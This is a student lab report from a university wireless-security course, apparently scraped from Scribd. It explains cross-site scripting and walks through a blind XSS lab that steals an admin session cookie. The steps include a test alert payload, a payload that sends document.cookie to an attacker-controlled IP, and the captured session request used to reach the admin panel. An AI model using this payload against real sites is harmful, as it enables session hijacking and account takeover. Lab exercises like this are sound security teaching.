Scribd
Upload
12 views8 pages

Cnise4 Group2..

Uploaded by

dicoz dipha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
12 views8 pages

Cnise4 Group2..

Uploaded by

dicoz dipha
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

THE UNIVERSITY OF DODOMA

COLLEGE OF INFORMATICS AND VIRTUAL EDUCATION

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING


COURSE NAME: WIRELESS SECURITY
COURSE CODE: IA 423
INSTRUCTOR: Ms. Zubeda Kilua
GROUP ASSIGNMENT 1: GROUP 2

S/N NAME REGISTRATION NO PROGRAMME


1. MILLENA A. SALEMA T21-03-04248 BSc.CNISE
2. FELIX R. KULUCHUMILA T21-03-05870 BSc.CNISE
3. ERICK A. JOSEPHAT T21-03-07757 BSc.CNISE
4. MALIATABU R. MIGANYALO T21-03-09362 BSc.CNISE
5. PHILIMON S. MBUNDA T21-03-15075 BSc.CNISE
6. ACHILEUS G. NICHOLAUS T21-03-04874 BSc.CNISE
7. SALEHE JUMA KITINE T/UDOM/2020/05244 BSc.CNISE
8. JAMES E. MACHIWA T/UDOM/2020/05229 BSc.CNISE
9. ROGER K. RESPIDIUS T21-03-08848 BSc.CNISE
10. ANGEL EWALD GODFREY T21-03-07484 BSc.CNISE
WIRELESS SECURITY LAB:

VULNERABILITY: CROSS SITE SCRIPTING(XSS)

Cross-site scripting (XSS) is a web security vulnerability that allows attackers to inject
malicious scripts into websites, which are then executed by the victim's browser. These
scripts can steal user data, hijack sessions, or redirect users to malicious websites. XSS
attacks often occur because websites don't properly sanitize user input before displaying
it, allowing attackers to insert code that can be executed by other users.

To check if cross site scripting vulnerability exists, we might need to try basics payload
such as <script>alert(“group4”)</script>, this is just a simple script just give a popup
of “group4” which proves the vulnerability exists. But also, in some most cases we
might get this script works in some other environments since, which means that blind

How XSS Attacks Work:


• Injection:
Attackers inject malicious scripts into a website, often by exploiting vulnerabilities in
how user-provided data is handled.
• Delivery:
The attacker's script is then delivered to other users who visit the vulnerable website,
usually in the form of a link or embedded in a page.
• Execution:
When a user visits the website, their browser executes the injected script, believing it
to be legitimate code from the site.
• Exploitation:
The attacker's script can then access user data, modify the website, or redirect the user
to a malicious site.

Types of XSS:

• Stored XSS:
The malicious script is stored on the server and is delivered to every user who visits the
website, like a comment section on a blog or social media.
• Reflected XSS:
The attacker injects malicious code into a request sent to the server, which is then
reflected back in the response to the victim's browser.
• DOM-based XSS:
The malicious code is executed in the victim's browser by manipulating the page's
Document Object Model (DOM), often by exploiting vulnerabilities in JavaScript code

In this lab we are going to demonstrate a simple blind cross site scripting and how to
reproduce it.
LAB EXPLOITATION AT SERVER LEVEL

STEP 1: Identifying a vulnerable endpoint that is vulnerable to xss.

As you can see above, we have a web service running above were provided with many
different endpoints one of them is login page which we have no creds so might now be
able to gain access on the admin portal but with xss we might try to steal admin cookies
and login as admin, but in order to find this vulnerable endpoint we might need to find
all endpoints for now we will go straight the endpoint that.

We have an admin portal which need credentials to login admin portal, we can take
advantage of xss to find an admin session and login using with his cookie.
STEP 2: After testing different type of xss paylods at the end we managed to find a
message box was vulnerable to blind xss, were by in order to produce this we need test
something like this.

STEP 3: Detecting blind XSS with a call back to our computer, we made a simple script
that will ping back to our computer so as to see if there is a vulnerable endpoint
After clicking the send button, we receive a simple call back to our computer as show
below, what we have done here is that we have set a simple python server from our
local computer and from the web page above we used our local computer IP address.

Since now we have a call back to our computer, we can try to elevate XSS and steal
cookies(admin). To do this were going to create a simple malicious php script as well
as a malicious js script that will be responsible to stealing a cookie as follows.
The index. Php script is a default landing page that we will send to admin, at the same
time the script.js file will execute the same time when an admin clicks our script and it
will send back the cookie or current session cookie, he has login with, another thing we
need here is to create a simple php server that will be ready to get the call back cookie
from admin.

STEP 4: Were going to modify the earlier payload we used to detect the blind xss
vulnerability like this.

payload: new Image().src='http://10.10.15.160/index.php?c='+document.cookie.


And when we click send again we receive the cookie to our server we set before.

Since now we got admin cookie we can use it to login with it, you can use cookie’s
editor or browser as well.
GET /index.php?c=session=fcfaf93ab169bc943b92109f0a845d99

And as we can see above image, we at the admin panel is a gold move we made with
XSS.

You might also like